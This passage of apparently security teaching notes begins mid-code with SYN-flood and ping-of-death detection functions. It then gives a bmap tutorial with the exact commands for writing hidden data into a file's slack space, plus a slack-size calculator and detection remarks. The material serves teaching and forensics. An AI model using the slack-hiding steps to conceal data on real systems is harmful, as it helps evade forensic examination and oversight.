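tcp        0      0 192.168.56.101:80       10.7.3.9:41222          SYN_RECV
tcp        0      0 192.168.56.101:80       45.1.8.200:3021         SYN_RECV
tcp        0      0 192.168.56.101:80       203.0.113.77:5555       SYN_RECV
tcp        0      0 192.168.56.101:80       198.51.100.4:1024       SYN_RECV
tcp        0      0 192.168.56.101:80       192.0.2.9:60001         SYN_RECV
tcp        0      0 192.168.56.101:22       192.168.56.1:51000      ESTABLISHED
tcp        0      0 192.168.56.101:80       192.168.56.1:51010      ESTABLISHED
"""


def half_open_by_port(netstat_text):
    """{local_port: (half_open_count, distinct_sources)} for SYN_RECV rows (netstat layout)."""
    counts, sources = Counter(), defaultdict(set)
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) < 6 or f[0] != "tcp" or f[5] != "SYN_RECV":
            continue
        lport = int(f[3].rsplit(":", 1)[1])
        counts[lport] += 1
        sources[lport].add(f[4].rsplit(":", 1)[0])
    return {p: (counts[p], len(sources[p])) for p in counts}


def syn_flood_suspects(netstat_text, threshold=4):
    """Ports with at least `threshold` half-open connections from at least that many sources.
    Legitimate load shows a few SYN_RECV that soon turn ESTABLISHED; a flood shows many
    that never do, each from a different (usually spoofed) address."""
    return sorted(p for p, (n, srcs) in half_open_by_port(netstat_text).items()
                  if n >= threshold and srcs >= threshold)


IPV4_MAX = 65535


def reassembled_size(frag_offset_units, payload_len, ip_header_len=20):
    """The fragment offset field counts 8-byte units; the IP header is present once."""
    return ip_header_len + frag_offset_units * 8 + payload_len


def is_ping_of_death(frag_offset_units, payload_len):
    """True when a fragment claims a position that makes the datagram exceed 65535 bytes,
    the check that patched IP stacks perform before copying into the reassembly buffer."""
    return reassembled_size(frag_offset_units, payload_len) > IPV4_MAX
```

The largest legal ping payload is 65507 bytes (65535 minus 20 bytes of IP header and 8 of ICMP); the classic attack sent a final fragment at offset 8189 (65512 bytes in) with up to 1480 bytes of data, which the arithmetic above rejects.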


==>Hiding data in the slack space using the bmap tool.

Download bmap and install it.

Installing the tool.

-Extract the files from the archive once done with the downloading.

#tar -xovf bmap-1.0.17.tar

#cd bmap-1.0.17

-Build it with make. The make utility automatically determines which pieces of the program need to be (re)compiled.

#make

-Create a symbolic link /sbin/bmap, because we want to access bmap from any directory. Since /sbin is in PATH, the link achieves that.

#ln -s /pathname/bmap-1.0.17/bmap /sbin/bmap

-Confirm that it is found via PATH.

#which bmap

-Now we are done with the installation, and our tool should be ready to explore.

#bmap --help

Writing into the slack space.

-Create a file, tst.txt

#touch tst.txt

#echo "Contents of the actual file goes in here" > tst.txt

-Check the size using the ls command.

#ls -l tst.txt

-Check the slack (prints whatever currently sits in the unused bytes of the file's last block).

#bmap --mode slack tst.txt

-Write into the slack space.

#echo "contents to be written to the slack goes in here" | bmap --mode putslack tst.txt

-Check the size using the ls command. It remains the same, because ls -l reports the file's logical size while the hidden data sits in the tail of the last allocated block, beyond end-of-file. Two caveats: the data survives only as long as the file is not grown or rewritten, and it is not invisible to a forensic examiner, who can read the raw blocks or run bmap --mode checkslack over the file system. bmap needs root, since it reads and writes the block device directly.

#ls -l tst.txt
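The numbers behind the trick: the file system allocates whole blocks, so a 41-byte file in a 4096-byte block leaves 4055 bytes of slack, and neither ls -l nor stat's st_size will ever change when bmap fills them. The script below is an added example, not bmap's code; it computes the slack for a file of a given size and block size, reads the real allocation of a file from stat() (st_blocks is always in 512-byte units), and recreates tst.txt in a temporary directory to report size, allocation and slack.

```python
"""What slack space is, in numbers: the file system allocates whole blocks, so a
file's last block has unused bytes between end-of-file and the block boundary.
Added example, not bmap's code. It shows why 'ls -l' cannot reveal data hidden
there: the logical size (st_size) never changes."""
import os
import tempfile


def block_slack(size, block_size):
    """Bytes left in the last allocated block for a file of `size` bytes."""
    if size == 0:
        return 0                          # an empty file has no data block at all
    return (-size) % block_size           # distance up to the next block boundary


def file_slack(path):
    """(slack, logical size, allocated bytes) for a real file, from stat().
    st_blocks is counted in 512-byte units regardless of the file system's block size;
    file systems that store tiny files inline may report 0 allocated blocks."""
    st = os.stat(path)
    allocated = st.st_blocks * 512
    return max(allocated - st.st_size, 0), st.st_size, allocated


def demo():
    """Recreate tst.txt as in the post and report what ls -l and the disk disagree about."""
    d = tempfile.mkdtemp()
    path = os.path.join(d, "tst.txt")
    with open(path, "w") as f:
        f.write("Contents of the actual file goes in here\n")
    slack, size, allocated = file_slack(path)
    return {"size": size, "allocated": allocated, "slack": slack,
            "slack_if_4k_blocks": block_slack(size, 4096)}
```

For the defender the same arithmetic is the detection: slack should be zero-filled (or hold stale remnants of whatever previously occupied the block), so non-zero, structured content between st_size and the block boundary is what --mode checkslack or any carving tool is looking for.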